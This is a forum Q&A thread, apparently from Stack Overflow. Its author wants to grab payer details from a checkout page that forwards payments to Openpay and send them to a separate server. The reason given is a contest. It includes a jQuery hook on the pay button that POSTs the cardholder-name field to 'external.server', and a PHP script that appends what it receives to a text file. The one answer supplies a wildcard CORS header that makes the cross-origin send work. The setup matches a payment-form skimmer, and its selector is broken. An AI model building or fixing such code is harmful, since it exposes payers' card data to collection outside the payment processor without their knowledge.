# Retrieving form info with javascript and redirecting it to another server

Tags: javascript, php, ajax

I am helping develop a temporary site that will be redirect payments to openpay for proper bank validation but I need to take payer info and redirect it to a different server to then from those users (within two weeks) select one for a contest. This is part of a promotion campaign for a small business.
What I want to do is take the payer information when they hit pay and have that information sent to my remote server but so far I haven't been able to capture the data.
Here is the js script I put together to capture the data:

```
<script type="text/javascript">
            $("#fm_pay\\:make_payment_button").click(function() { 
                var name_of_customer = $('data-openpay-card="name_of_customer"').val();
                //console.log(data);
                $.ajax({
                    type: "POST",
                    beforeSend: function (xhr, opts) {
                    if (name_of_customer == "") { xhr.abort(); }
                    }, //close beforesend
                    url: "http://external.server/the.php",
                    dataType: "json",
                    data: {name_of_customer:name_of_customer},
                    });
                });
        </script>
```

This is what is on the main site taking in payments:

```
 <div class="row">
                                        <div class="col-md-12">
                                            <div class="form-group form-group-lg">
                                                <label for="">Cardholder name <label for="" class="text-red text-bold">*</label></label>
                                        <input type="text" class="form-control" placeholder="as it appears on the card" data-openpay-card="holder_name">
                                            </div>
                                        </div>
```

And finally here is what i have on my remote server taking in data:

```
<?php
$name_of_customer = $_POST['name_of_customer'];

$sep = "==================================================
Name: $name_of_customer
==================================================
";


$file = fopen("contest.txt", "a+");
fwrite($file, $sep.PHP_EOL);
fclose($file);
?>
```

Thanks! Any help is welcomed!

Comment: What is your actual question? Does something not work? Do you get any errors? If so, please post them in your question

Comment: There is no `$_POST['name']`, you're not sending any key with that name

Comment: I am not sure as to how to get the data from the form and send it to my remote server using javascript. My remote server has a php file which is posted above and I'd like it to simply store the information in a txt file for further processing. How do I accomplish the customer's name to be retrieved from the form when the pay button is clicked?

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Answer (score 0):

add this in your php file:

```
header("access-control-allow-origin: *");
```